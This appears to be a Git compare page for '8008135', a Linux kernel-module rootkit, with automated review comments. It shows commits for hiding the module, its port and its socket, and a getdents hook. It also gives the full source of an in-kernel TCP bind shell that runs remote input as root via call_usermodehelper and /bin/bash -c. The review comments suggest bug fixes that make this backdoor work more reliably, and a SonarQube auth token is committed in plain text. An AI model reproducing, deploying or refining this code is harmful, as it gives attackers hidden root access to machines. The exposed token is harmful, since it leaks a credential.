Compare commits

...

36 Commits
v0.1 ... master

Author SHA1 Message Date
d2e91393a1 Update Jenkinsfile 2020-01-31 00:08:44 +01:00
1dfb5c4f78 Update Jenkinsfile 2020-01-31 00:07:40 +01:00
74f688b323 Updating sonarfile 2020-01-30 23:39:55 +01:00
2b80006e02 Pipeline test 2020-01-30 17:24:27 +01:00
566eb7b791 Pipeline Test 2020-01-30 17:16:32 +01:00
d8d81efdeb Pipeline Test 2020-01-30 17:14:31 +01:00
ff6864f191 Pipeline Test 2020-01-30 17:13:10 +01:00
a17c502e4f Pipeline Test 2020-01-30 17:09:39 +01:00
13dad459ba Fixing Jenkinsfile 2020-01-30 17:05:04 +01:00
03ed30acf3 Added Jenkinsfile and sonarfile 2020-01-30 17:02:13 +01:00
Jan Körner
be224f55a6 Merge branch 'dev_jkr' into 'master'
# Conflicts:
#   src/8008135.c
2019-12-08 13:00:19 +00:00
Jan Koerner
3e30a6df32 Hide socket from ss 2019-12-08 13:33:50 +01:00
7a486df14c Updating gitignore and Makefile for new needs 2019-12-08 12:05:40 +01:00
6ad05f1c20 OutSourcing 2019-12-08 12:05:07 +01:00
c897df31ec Dude, that was really badly written code 2019-12-08 12:04:42 +01:00
ed5b2fa92a CleanUp 2019-12-08 12:02:33 +01:00
53e95217c2 Removing single-line comments 2019-12-08 12:02:08 +01:00
800779a376 ifdef HARMLESS around otherwise unneeded var 2019-12-08 12:01:37 +01:00
04f29d2e03 Adjusted the code generation script so that the explicit definition of the variables is in the C file and the header file holds the declaration for external 2019-12-08 12:00:46 +01:00
bbf48681e0 Let's pretend we would use helper functions 2019-12-08 11:59:14 +01:00
valentin lechner
dcd4c6588a Delete 5y563n.h 2019-12-08 01:13:25 +00:00
500087d2ca exporting functions to files 2019-12-08 01:10:48 +00:00
bd0a37f68b Merge remote-tracking branch 'origin/master' into dev_vlr 2019-12-08 00:25:52 +00:00
4a8df7d308 Downstream merge to get access to latest ver
Merge branch 'master' into dev_vlr
2019-12-08 00:22:06 +00:00
Jan Körner
a598ee7319 Merge branch 'master' into 'dev_jkr'
Master

See merge request jan-koerner-enterprises/8008135!2
2019-12-07 23:34:31 +00:00
Jan Koerner
14a0ea6b8f hide open port from netstat 2019-12-08 00:31:43 +01:00
4aa1387a89 Adding call_usermodehelper to input commands as root 2019-12-07 15:37:35 +01:00
f187dc64d3 Merge branch 'dev_vlr' 2019-12-05 20:14:10 +01:00
Jan Körner
f613f77845 Merge branch 'dev_jkr' into 'master'
Implemented module hiding

See merge request jan-koerner-enterprises/8008135!1
2019-12-01 22:48:31 +00:00
Jan Koerner
b02de7a8e0 Implemented module hiding 2019-12-01 23:45:00 +01:00
Jan Koerner
cbe0fabcea Implemented module hiding 2019-12-01 23:40:43 +01:00
Jan Koerner
4f9a5c5143 Updated .gitignore 2019-12-01 17:28:03 +01:00
3abccec17e Refactoring 2019-11-22 16:40:18 +01:00
24a629d7e8 Renaming TODO to TODO.md for online markdown support 2019-11-22 00:46:13 +01:00
6306de6234 Adding TODO file 2019-11-22 00:44:19 +01:00
28c4025758 Adding a Socket Server to the Linux Kernel Module
Gone a long way from trying to implement a socket bindshell
using the standard C-Libraries (which obv. doesn't work in LKM!),
then implementing an ASM-Solution only to find out there are problems
with the x86/x32 bit and knowing that I have no clue of how to write ASM,
I thought of looking into sockets on linux kernel modules - AAAND
found one. So the files:
* src/50ck3t.c
* src/headers/50ck3t.h
are basically from
https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git
Thanks for sharing! There will prob. be some additions and modifications.

Makefile:
* Some Stuff had to be renamed in the Makefile due to
Renaming src/create_sysgen.sh -> src/cr3473_5y563n.sh &
Added src/headers/50ck3t.h, src/50ck3t.c

Including src/headers/50ck3t.h in 8008135.c

Changing Module License to GPL, somehow GPLv3 was a problem to the compiler
because of do_exit
2019-11-22 00:32:36 +01:00
20 changed files with 1492 additions and 119 deletions

.gitignore vendored

@ -9,9 +9,10 @@ sysgen.h
*.a
*.ko
*.o
*5y563n.*
*~
*.symvers
*.order
.tmp_versions/
*.cmd
.vscode/
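Review bot: the pattern `*5y563n.*` is broader than the generated files it is meant to cover. It also matches the generator script `src/cr3473_5y563n.sh` that the Makefile runs, so a fresh `git add` of that script is silently ignored. Anchor the ignore to the generated outputs instead, i.e. `src/5y563n.c` and `src/headers/5y563n.h`.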

Jenkinsfile vendored Normal file

@ -0,0 +1,26 @@
#!/usr/bin/env groovy
pipeline {
agent any
stages{
stage('checkout VCS'){
steps{
checkout scm
}
}
stage('compile'){
steps{
sh 'echo "fake-compiling..."'
}
}
stage('deploySONAR'){
steps{
sh 'sonar-scanner'
}
}
}
}
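Review bot: the 'compile' stage only runs `sh 'echo "fake-compiling..."'`, so the pipeline goes green without ever building the module and `sonar-scanner` analyses sources that were never compiled. Run the real build (the Makefile's `all` target) in this stage, or drop the stage so it does not suggest a build check that is not there. `agent any` also lets the job land on any node; pin it to a labelled agent that has the kernel headers and sonar-scanner installed.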

@ -19,12 +19,18 @@ INCL_H := $(PWD)/$(INCL_S)/headers
obj-m += $(MNAME).o
# Core
$(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/637d3n75.o
$(MNAME)-y += src/50ck3t.o
$(MNAME)-y += src/h1d3p0r7.o
$(MNAME)-y += src/h1d3m0dul3.o
$(MNAME)-y += src/p463unpr073c7.o
$(MNAME)-y += src/5y563n.o
# Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall
all:
$(shell $(SRCS_S)/create_sysgen.sh)
$(shell $(SRCS_S)/cr3473_5y563n.sh)
$(MAKE) -C $(BUILDDIR) M=$(PWD) modules
load:
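Review bot: in the `all` recipe, `$(shell $(SRCS_S)/cr3473_5y563n.sh)` makes make ignore the script's exit status and instead run whatever the script printed as a shell command, so the script's `exit 2` for a missing `sys_call_table` entry surfaces, if at all, as an unrelated "command not found". Call the script as a plain recipe line (`$(SRCS_S)/cr3473_5y563n.sh`) so that a failure aborts the build before `$(MAKE) -C $(BUILDDIR) M=$(PWD) modules` runs.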
@ -34,5 +40,5 @@ unload:
rmmod $(MNAME)
clean:
-rm $(SRCS_H)/sysgen.h
-rm $(SRCS_H)/5y563n.h
$(MAKE) -C $(BUILDDIR) M=$(PWD) clean
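Review bot: `clean` removes the generated header under `$(SRCS_H)` but not the generated `5y563n.c` that cr3473_5y563n.sh writes next to itself, so a source file carrying kernel-specific addresses stays in the tree after a clean. Add a matching `-rm $(SRCS_S)/5y563n.c`.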

TODO.md Normal file

@ -0,0 +1,10 @@
# Pick One
## TCP Socket
* Add binding to shell:
* Incoming commands have to be redir to bash
* STDOUT, STDIN, STDERR Handling
* Remove chat, debug stuff
* Hide open Port
## Module
* Hide itself

sonar-project.properties Normal file

@ -0,0 +1,187 @@
#*******************************************************************************
#
# FILE: sonar-project.properties
#
# USAGE:
#
# DESCRIPTION:
#
# OPTIONS: -
# REQUIREMENTS: SonarQube/SonarCloud
# BUGS: Hoffentlich keine, bei Problemen bitte kontaktieren
# NOTES:
# AUTHOR: vlr
# ORGANIZATION: Jan Koerner Enterprises
# CREATED: 30.01.2019 22:22:55
# REVISION: 1
#*******************************************************************************
# Diese Datei ist das Äquivalent der "Jenkins"- oder "Dockerfile" für SonarQube
# Anhand in dieser Datei spezifizierter Parameter wird das Entwicklungsprojekt
# von SonarQube analysiert
#*** Allgemeines *************************************************************
# Host URL, muss angegeben werden
sonar.host.url=https://sonar.fuxxbau.net
# Default: <url> (maven)
sonar.links.homepage=https://www.fuxxbau.net
# Default: <ci-management> (maven)
sonar.links.ci=http://jenkins.fuxxbau.net
# Default: System Encoding
sonar.sourceEncoding=UTF-8
# sonar.organization=highQ
#*******************************************************************************
#*** Debug *******************************************************************
# M\"ogliche Werte: DEBUG, INFO
# Default: INFO
sonar.log.level=DEBUG
# Ausgabe aller spezifizierten Einstellungen zur Scanner API in ein File
# sonar.scanner.dumpToFile=dump.txt
# Stelle, an die vom Scanner die "report-task.txt" geschrieben wird
# Default: sonar.working.directory
# sonar.scanner.metadataFilePath=
# Stelle in Logs dar, an welchen Stellen der Analyzer wv Zeit ben\"otigt
# Logs zu finden in workingDir/profiling/moduleKey-profiler.xml
# workingDir=.sonar/profiling (sonarscanner)
# bzw target/sonar/profiling (sonarscanner for maven)
# Default: false
# sonar.showProfiling=
# NOTE: There is the potential for this setting to expose sensitive information
# such as passwords if they are stored as server-side environment variables.
# sonar.verbose=
#*******************************************************************************
#*** Projekt *****************************************************************
# Der einzigartige Key des Projekts (Maven Default: <groupId>:<artifactId>
# Erlaubt sind hier Zahlen, Buchstaben, "-","_",".",":"
# mindestens ein char muss keine Zahl sein
# muss angegeben sein, entweder durch maven oder manuell
sonar.projectKey=JKE-8008135
# Hier kann entweder Login über einen Nutzer erstellt werden oder \"uber
# ein Login-Token (Weboberfläche -> My Account -> Security -> Generate Token)
# Wenn sonar.password leer ist wird sonar.login als Auth-Token interpretiert
# Alternativ: Anyone-Gruppe Analyse Rechte zuweisen (Serverseitig)
sonar.login=f116f5c7835d1a62d364355fb24e7ca8e416575e
# sonar.password=
# Name, der in der Weboberfläche angezeigt wird
sonar.projectName=JKE-8008135
# Default: <version> (maven), sonst "not provided"
# sonar.projectVersion=
# Default: <description> (maven)
# sonar.projectDescription=
# Kann nicht früher als das letzte Datum der Analyse dieses Projekts in DB sein
# Default:Now. Angabe in yyyy-MM-dd
# sonar.projectDate=
# Kann verwendet werden um zu bestimmen dass die Analyse des Projekts an
# anderer Stelle stattfindet
# ben\"otigt Schreibrechte f\"ur Erstellung von sonar.working.directory
# Default=./
# sonar.projectBaseDir=
#*******************************************************************************
# Max Zeit um auf Webservice Call zu warten (in sec, Default 60)
# Nützlich um auf Timeouts zu reagieren
# sonar.ws.timeout=
#*** SCM *********************************************************************
# Das Plugin, das von SonarQube für das Abfragen von SCM Daten verwendet wird
# Default: Autodetect (-> svn, wenn .svn Ordner hier existiert; git wenn .git)
sonar.scm.provider=git
# Standardm\"assig werden nur bei ver\"anderten Files blame Informationen geladen
# Wenn die Daten outdatet sind, kann man hier auf "true" stellen um upzudaten
# sonar.scm.forceReloadAll=
# Standardm\"assig werden Dateien die vom SCM ignoriert werden (bsp .gitignore)
# bei der Analyse ebenfalls ignoriert.
# Wenn man diesen Wert hier auf true setzt, disabled man dieses Feature
# Default: false
# sonar.scm.exclusions.disabled=
# Überschreiben der Revision
# Default: Provided von CI oder von source geraten
# sonar.scm.revision=
# Default: <issueManagement><url> (maven)
# sonar.links.issue=
# Default: <scm><url> (maven)
# sonar.links.scm=
# Comma Seperated Pfadliste für Generic Issue Reports
# sonar.externalIssuesReportPaths=
#*******************************************************************************
#*** Build *******************************************************************
# Wenn weder sonar.sources noch sonar.tests gegeben: BaseDir(=./)
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild).
sonar.sources=.
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild). Sonst leer
# sonar.tests=
# Habe ich nicht ganz einordnen k\"onnen, wof\"ur.
# Offizieller Text:
# The string passed with this property will be stored with the analysis and available in the results of api/project_analyses/search, thus allowing you to later identify a specific analysis and obtain its ID for use with api/project_analyses/set_baseline.
# sonar.buildString=
#*******************************************************************************
#*** Analyse *****************************************************************
# Default:.scannerwork
# sonar.working.directory=
# Hinzuf\"ugen von key-value Paaren zum Analysekontext (-> Webhooks)
# sonar.analysis.[Key001]=
# sonar.analysis.[Key002]=
# Standardm\"assig gilt ein Code als dupliziert wenn mind. 100 Token des Codes
# gleich sind (über 10 Zeilen hinweg)
# Kann sprachenspezifisch überschrieben werden
# sonar.cpd.${language}.minumumtokens=
# sonar.cpd.${language}.minimumLines=
# Diese Parameter sorgen daf\"ur, dass Code zwischen Bl\"ocken nicht analysiert
# wird. Leider werden diese Parameter nicht offiziell unterst\"utzt
# https://community.sonarsource.com/t/how-to-set-sonar-issue-ignore-block-in-sonar-project-properties/10943/6
# Offiziell unterst\"utzt wird nur eine globale Einstellung im Webinterface
# siehe:
# Administration->Configuration->General->Analysis Scope->Ignore Issues in Blocks
# Wird von einem SonarQube Entwickler als "Hack" bezeichnet, was ich nicht
# verstehe, es ist mmN legitim, hier Proj Spezifische Settings zu haben (oder zmd: zu haben wollen).
# Wahrscheinlich ist es auch m\"oglich, andere Einstellungen die im WebUI
# zu finden sind hier zu "hacken"
# sonar.issue.ignore.block=ignore-generated
# sonar.issue.ignore.block.ignore-generated.beginBlockRegexp=DA-ELSE
# sonar.issue.ignore.block.ignore-generated.endBlockRegexp=DA-END
# Hier ein weiteres Beispiel, bei dem das ganze file von Analyse ausgeschlossen
# wird, wenn "@sonar-disable" im File vorkommt
# sonar.issue.ignore.allfile=ignore-file
# sonar.issue.ignore.allfile.ignore-file.fileRegexp=@sonar-disable
#*******************************************************************************
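Review bot: the `sonar.login=` line commits an analysis token in plain text, and the file's own comment states that it is read as an auth token when `sonar.password` is empty, so anyone who can read the repository can authenticate to `sonar.host.url` with it. Revoke that token, remove the line, and have Jenkins inject the value at run time from its credentials store (for example as `-Dsonar.login=...` on the `sonar-scanner` call). With `sonar.log.level=DEBUG` the scanner log is more likely to echo settings, which the NOTE above `sonar.verbose` already warns about, and `sonar.links.ci` points at plain `http://`.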

src/50ck3t.c Normal file

@ -0,0 +1,567 @@
/*
*
* NOTE:
* this is basically this guys code:
* https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git
* his last update was 4 years ago, so there might be some changes,
* there definitely will be some regarding the data received/sent back since
* this is will be used as a bindshell
* but base is his work.
*
*/
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**** includes *****************************************************************
*******************************************************************************/
#include "50ck3t.h"
#ifdef HARMLESS
#else
#include <linux/init.h>
#include "610b415.h"
#endif
/**** types *******************************************************************
*******************************************************************************/
#ifdef HARMLESS
#else
static char *SEnvP[] = {
"HOME=/",
NULL
};
#endif
struct tcp_conn_handler_data{
struct sockaddr_in *FAddress;
struct socket *FAcceptSocket;
int FThreadID;
};
struct tcp_conn_handler{
struct tcp_conn_handler_data *data[MAX_CONNS];
struct task_struct *thread[MAX_CONNS];
int tcp_conn_handler_stopped[MAX_CONNS];
};
struct tcp_conn_handler *STCPConnHandler;
struct tcp_server_service{
int FRunning;
struct socket *FListenSocket;
struct task_struct *FThread;
struct task_struct *FAccpeptThread;
};
struct tcp_server_service *FTCPServer_Service;
/**** var **********************************************************************
*******************************************************************************/
static int STCPListenerStopped = 0;
static int STCPAcceptorStopped = 0;
char *inet_ntoa(struct in_addr *AInAddr){
char *LIPAddr = NULL;
u_int32_t LIPInt = 0;
LIPAddr = kmalloc(16 * sizeof(char), GFP_KERNEL);
if(!LIPAddr)
return NULL;
else
memset(LIPAddr, 0, 16);
LIPInt = AInAddr->s_addr;
sprintf(LIPAddr, "%d.%d.%d.%d", (LIPInt) & 0xFF, (LIPInt >> 8) & 0xFF,
(LIPInt >> 16) & 0xFF, (LIPInt >> 16) & 0xFF);
return LIPAddr;
}
int tcp_server_send(struct socket *ASocket, int AID, const char *ABuf,\
const size_t ALength, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen, LWritten, LLeft;
mm_segment_t LOldMM;
LWritten = 0;
LLeft = ALength;
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LMsgHeader.msg_flags = 0;
LOldMM = get_fs(); set_fs(KERNEL_DS);
repeat_send:
LVec.iov_len = LLeft;
LVec.iov_base = (char *)ABuf + LWritten;
LLen = kernel_sendmsg(ASocket, &LMsgHeader, &LVec, LLeft, LLeft);
if((LLen == -ERESTARTSYS) || (!(AFlags & MSG_DONTWAIT) &&\
(LLen == -EAGAIN)))
goto repeat_send;
if(LLen > 0){
LWritten += LLen;
LLeft -= LLen;
if(LLeft)
goto repeat_send;
}
set_fs(LOldMM);
return LWritten?LWritten:LLen;
}
int tcp_server_receive(struct socket *ASock, int AID,struct sockaddr_in *AAddress,\
unsigned char *ABuf,int ASize, unsigned long AFlags){
struct msghdr LMsgHeader;
struct kvec LVec;
int LLen;
char *LTmp = NULL;
if(ASock==NULL){
pr_info(" *** mtp | tcp server receive socket is NULL| "
" tcp_server_receive *** \n");
return -1;
}
LMsgHeader.msg_name = 0;
LMsgHeader.msg_namelen = 0;
LMsgHeader.msg_control = NULL;
LMsgHeader.msg_controllen = 0;
LMsgHeader.msg_flags = AFlags;
LVec.iov_len = ASize;
LVec.iov_base = ABuf;
read_again:
if(!skb_queue_empty(&ASock->sk->sk_receive_queue))
pr_info("recv queue empty ? %s \n",
skb_queue_empty(&ASock->sk->sk_receive_queue)?"yes":"no");
LLen = kernel_recvmsg(ASock, &LMsgHeader, &LVec, ASize, ASize, AFlags);
if(LLen == -EAGAIN || LLen == -ERESTARTSYS)
goto read_again;
LTmp = inet_ntoa(&(AAddress->sin_addr));
pr_info("client-> %s:%d, says: %s\n", LTmp, ntohs(AAddress->sin_port), ABuf);
kfree(LTmp);
return LLen;
}
int connection_handler(void *AData){
struct tcp_conn_handler_data *LConnData =
(struct tcp_conn_handler_data *)AData;
struct sockaddr_in *LAddress = LConnData->FAddress;
struct socket *LAcceptSocket = LConnData->FAcceptSocket;
int LID = LConnData->FThreadID;
int LRet;
int LLen = 49;
unsigned char LInBuf[LLen+1];
#ifdef HARMLESS
unsigned char LOutBuf[LLen+1];
#else
#endif
DECLARE_WAITQUEUE(recv_wait, current);
allow_signal(SIGKILL|SIGSTOP);
while(1){
add_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
while(skb_queue_empty(&LAcceptSocket->sk->sk_receive_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server handle connection "
"thread stopped | connection_handler *** \n");
//tcp_conn_handler->thread[id] = NULL;
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\
&recv_wait);
goto out;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait);
pr_info("receiving message\n");
memset(LInBuf, 0, LLen+1);
LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\
MSG_DONTWAIT);
if(LRet > 0){
#ifdef HARMLESS
if(memcmp(LInBuf, "HOLA", 4) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "HOLASI");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
}
if(memcmp(LInBuf, "ADIOS", 5) == 0){
memset(LOutBuf, 0, LLen+1);
strcat(LOutBuf, "ADIOSAMIGO");
pr_info("sending response: %s\n", LOutBuf);
tcp_server_send(LAcceptSocket, LID, LOutBuf,\
strlen(LOutBuf), MSG_DONTWAIT);
break;
}
#else
int Ret;
printk(LInBuf);
char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL};
printk("Calling usermodehelper");
Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC);
printk("\nRet is %i \n", Ret);
#endif
}
}
out:
STCPConnHandler->tcp_conn_handler_stopped[LID]= 1;
kfree(STCPConnHandler->data[LID]->FAddress);
kfree(STCPConnHandler->data[LID]);
sock_release(STCPConnHandler->data[LID]->FAcceptSocket);
STCPConnHandler->thread[LID] = NULL;
do_exit(0);
}
int tcp_server_accept(void){
int LAcceptErr = 0;
struct socket *LSocket;
struct socket *LAcceptSocket = NULL;
struct inet_connection_sock *LISock;
int LID = 0;
DECLARE_WAITQUEUE(accept_wait, current);
allow_signal(SIGKILL|SIGSTOP);
LSocket = FTCPServer_Service->FListenSocket;
pr_info(" *** mtp | creating the accept socket | tcp_server_accept "
"*** \n");
while(1){
struct tcp_conn_handler_data *LTCPConnHData = NULL;
struct sockaddr_in *LClient = NULL;
char *LTmp;
int addr_len;
LAcceptErr =
sock_create(LSocket->sk->sk_family, LSocket->type,\
LSocket->sk->sk_protocol, &LAcceptSocket);
if(LAcceptErr < 0 || !LAcceptSocket){
pr_info(" *** mtp | accept_error: %d while creating "
"tcp server accept socket | "
"tcp_server_accept *** \n", LAcceptErr);
goto err;
}
LAcceptSocket->type = LSocket->type;
LAcceptSocket->ops = LSocket->ops;
LISock = inet_csk(LSocket->sk);
add_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
while(reqsk_queue_empty(&LISock->icsk_accept_queue)){
__set_current_state(TASK_INTERRUPTIBLE);
schedule_timeout(HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread "
"stopped | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
sock_release(LAcceptSocket);
return 0;
}
if(signal_pending(current)){
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait,\
&accept_wait);
goto release;
}
}
__set_current_state(TASK_RUNNING);
remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait);
LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d while accepting "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LClient = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL);
memset(LClient, 0, sizeof(struct sockaddr_in));
addr_len = sizeof(struct sockaddr_in);
LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket,
(struct sockaddr *)LClient,
&addr_len, 2);
if(LAcceptErr < 0){
pr_info(" *** mtp | accept_error: %d in getname "
"tcp server | tcp_server_accept *** \n",
LAcceptErr);
goto release;
}
LTmp = inet_ntoa(&(LClient->sin_addr));
pr_info("connection from: %s %d \n",
LTmp, ntohs(LClient->sin_port));
kfree(LTmp);
pr_info("handle connection\n");
for(LID = 0; LID < MAX_CONNS; LID++){
if(STCPConnHandler->thread[LID] == NULL)
break;
}
pr_info("gave free id: %d\n", LID);
if(LID == MAX_CONNS)
goto release;
LTCPConnHData = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL);
memset(LTCPConnHData, 0, sizeof(struct tcp_conn_handler_data));
LTCPConnHData->FAddress = LClient;
LTCPConnHData->FAcceptSocket = LAcceptSocket;
LTCPConnHData->FThreadID = LID;
STCPConnHandler->tcp_conn_handler_stopped[LID] = 0;
STCPConnHandler->data[LID] = LTCPConnHData;
STCPConnHandler->thread[LID] =
kthread_run((void *)connection_handler, (void *)LTCPConnHData, MODULE_NAME);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server acceptor thread stopped"
" | tcp_server_accept *** \n");
STCPAcceptorStopped = 1;
return 0;
}
if(signal_pending(current)){
break;
}
}
STCPAcceptorStopped = 1;
do_exit(0);
release:
sock_release(LAcceptSocket);
err:
STCPAcceptorStopped = 1;
do_exit(0);
}
int tcp_server_listen(void)
{
int LServerErr;
struct socket *LConnSocket;
struct sockaddr_in LServer;
DECLARE_WAIT_QUEUE_HEAD(wq);
allow_signal(SIGKILL|SIGTERM);
LServerErr = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\
&FTCPServer_Service->FListenSocket);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while creating tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto err;
}
LConnSocket = FTCPServer_Service->FListenSocket;
FTCPServer_Service->FListenSocket->sk->sk_reuse = 1;
LServer.sin_addr.s_addr = INADDR_ANY;
LServer.sin_family = AF_INET;
LServer.sin_port = htons(DEFAULT_PORT);
LServerErr =
LConnSocket->ops->bind(LConnSocket, (struct sockaddr*)&LServer,\
sizeof(LServer));
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while binding tcp server "
"listen socket | tcp_server_listen *** \n", LServerErr);
goto release;
}
LServerErr = LConnSocket->ops->listen(LConnSocket, 16);
if(LServerErr < 0){
pr_info(" *** mtp | Error: %d while listening in tcp "
"server listen socket | tcp_server_listen "
"*** \n", LServerErr);
goto release;
}
FTCPServer_Service->FAccpeptThread =
kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME);
while(1){
wait_event_timeout(wq, 0, 3*HZ);
if(kthread_should_stop()){
pr_info(" *** mtp | tcp server listening thread"
" stopped | tcp_server_listen *** \n");
return 0;
}
if(signal_pending(current))
goto release;
}
sock_release(LConnSocket);
STCPListenerStopped = 1;
do_exit(0);
release:
sock_release(LConnSocket);
err:
STCPListenerStopped = 1;
do_exit(0);
}
int tcp_server_start(void){
FTCPServer_Service->FRunning = 1;
FTCPServer_Service->FThread = kthread_run((void *)tcp_server_listen, NULL,\
MODULE_NAME);
return 0;
}
int network_server_init(void){
pr_info(" *** mtp | network_server initiated | "
"network_server_init ***\n");
FTCPServer_Service = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL);
memset(FTCPServer_Service, 0, sizeof(struct tcp_server_service));
STCPConnHandler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL);
memset(STCPConnHandler, 0, sizeof(struct tcp_conn_handler));
tcp_server_start();
return 0;
}
void network_server_exit(void){
int ret;
int id;
if(FTCPServer_Service->FThread == NULL)
pr_info(" *** mtp | No kernel thread to kill | "
"network_server_exit *** \n");
else
{
for(id = 0; id < MAX_CONNS; id++)
{
if(STCPConnHandler->thread[id] != NULL)
{
if(!STCPConnHandler->tcp_conn_handler_stopped[id])
{
ret =
kthread_stop(STCPConnHandler->thread[id]);
if(!ret)
pr_info(" *** mtp | tcp server "
"connection handler thread: %d "
"stopped | network_server_exit "
"*** \n", id);
}
}
}
if(!STCPAcceptorStopped)
{
ret = kthread_stop(FTCPServer_Service->FAccpeptThread);
if(!ret)
pr_info(" *** mtp | tcp server acceptor thread"
" stopped | network_server_exit *** \n");
}
if(!STCPListenerStopped)
{
ret = kthread_stop(FTCPServer_Service->FThread);
if(!ret)
pr_info(" *** mtp | tcp server listening thread"
" stopped | network_server_exit *** \n");
}
if(FTCPServer_Service->FListenSocket != NULL && !STCPListenerStopped)
{
sock_release(FTCPServer_Service->FListenSocket);
FTCPServer_Service->FListenSocket = NULL;
}
kfree(STCPConnHandler);
kfree(FTCPServer_Service);
FTCPServer_Service = NULL;
}
}
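Review bot: in `connection_handler`, both the `kthread_should_stop()` branch and the `out:` label call `kfree(STCPConnHandler->data[LID])` and then read `STCPConnHandler->data[LID]->FAcceptSocket` for `sock_release`, which is a use-after-free; release `LAcceptSocket` first and free the slot afterwards. In the non-HARMLESS branch `printk(LInBuf)` uses bytes received from the peer as the format string and should be `printk("%s", LInBuf)`. In `inet_ntoa` the fourth octet repeats `(LIPInt >> 16) & 0xFF` where `>> 24` is meant, and in `tcp_server_send` the assignment `LMsgHeader.msg_flags = AFlags;` is overwritten with `0` on the next line. The `kmalloc` results for `LClient`, `LTCPConnHData`, `FTCPServer_Service` and `STCPConnHandler` go straight into `memset` without a NULL check.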

src/610b415.c Normal file

@ -0,0 +1,20 @@
/*
* 610b415.c
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#include "610b415.h"
char * stringRemoveChars(char *AString, char *ASpanset){
char *LPtr = AString;
LPtr = strpbrk(LPtr, ASpanset);
while(LPtr != NULL) {
*LPtr = ' ';
LPtr = strpbrk(LPtr, AString);
}
return AString;
}
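Review bot: inside the loop of `stringRemoveChars`, `strpbrk(LPtr, AString)` searches for the string's own characters instead of `ASpanset`. Because `LPtr` points into `AString`, the call returns `LPtr` again and the loop never terminates once a first match has been found. Use `LPtr = strpbrk(LPtr + 1, ASpanset);`. The name says "remove" while the body overwrites matches with a space; a one-line comment stating that would avoid surprises for callers.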

src/637d3n75.c Normal file

@ -0,0 +1,74 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "637d3n75.h"
/*** var ********************************************************************
*******************************************************************************/
sys_getdents_ptr sys_getdents_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
